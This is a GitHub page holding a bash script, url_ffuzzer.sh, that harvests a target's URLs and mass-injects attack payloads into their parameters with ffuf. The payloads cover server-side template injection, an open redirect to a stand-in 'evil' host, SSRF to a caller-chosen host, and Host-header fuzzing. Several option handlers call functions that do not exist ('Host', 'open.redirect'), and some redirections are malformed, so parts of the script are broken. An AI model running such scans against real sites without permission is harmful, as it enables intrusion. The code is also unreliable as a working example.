-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathurl_ffuzzer.sh
executable file
·96 lines (83 loc) · 2.23 KB
/
url_ffuzzer.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
#!/bin/bash
function create_wl(){
mkdir -p url
cd url
#get urls
#cat ../scope |waybackurls |tee -a url
cat ../scope |gau -subs |tee -a url
cat url |sort -u -o url
cat url |grep -viE "(jpg|jpej|gif|css|tif|tiff|png|ttf|woff|woff2|ico|svg)$" |sort -u -o url
#get url with parameters
cat url |grep "=" |tee -a url.param
cat url |unfurl -u paths
}
function verify(){
if [ ! -d url ];then
rm -rf url url.param 2&> /dev/null
create_wl
elif [ -f ./url/url.param ];then
cd url
cat url |grep "=" > url.param
fi
}
function ssti(){
verify
#create ssti template
rm -rf url.ssti 2&> /dev/null
cat url.param |qsreplace "ssti{{7*7}}" |tee -a url.ssti
cat url.ssti |sort -u -o url.ssti
ffuf -u FUZZ -w url.ssti -t 30 -mr "ssti49" -o ssti.result
}
function open_redirect(){
verify
rm -rf url.redirect 2&> /dev/null
#create open redirect template
cat url.param |qsreplace "http://evil" |tee -a url.redirect
cat url.redirect |sort -u -o url.redirect
ffuf -u FUZZ -w url.redirect -t 30 -mr "evil.com" -o open_redirect.result
}
function ssrf(){
verify
rm -rf url.ssrf 2&> /dev/null
#create ssrf template
cat url.param |qsreplace "http://$1" |tee -a url.ssrf
cat url.ssrf |sort -u -o url.ssrf
ffuf -u FUZZ -w url.ssrf -t 30 -o ssrf.result
}
function host(){
#create ssrf template
ffuf -u FUZZ -w ./url -H "Host: $1" -t 30 -o ssrf.result
}
function help(){
echo "usage:"
echo -e "\t s \t ssrf (require)"
echo -e "\t t \t ssti"
echo -e "\t o \t open redirect"
}
while getopts ":s:H:to" OPTION
do
case $OPTION in
s)
ssrf "$OPTARG"
;;
H)
Host "$OPTARG"
;;
t)
ssti
exit 1
;;
o)
open.redirect
exit 1
;;
:)
help
exit 1
;;
\?)
help
exit 1
;;
esac
done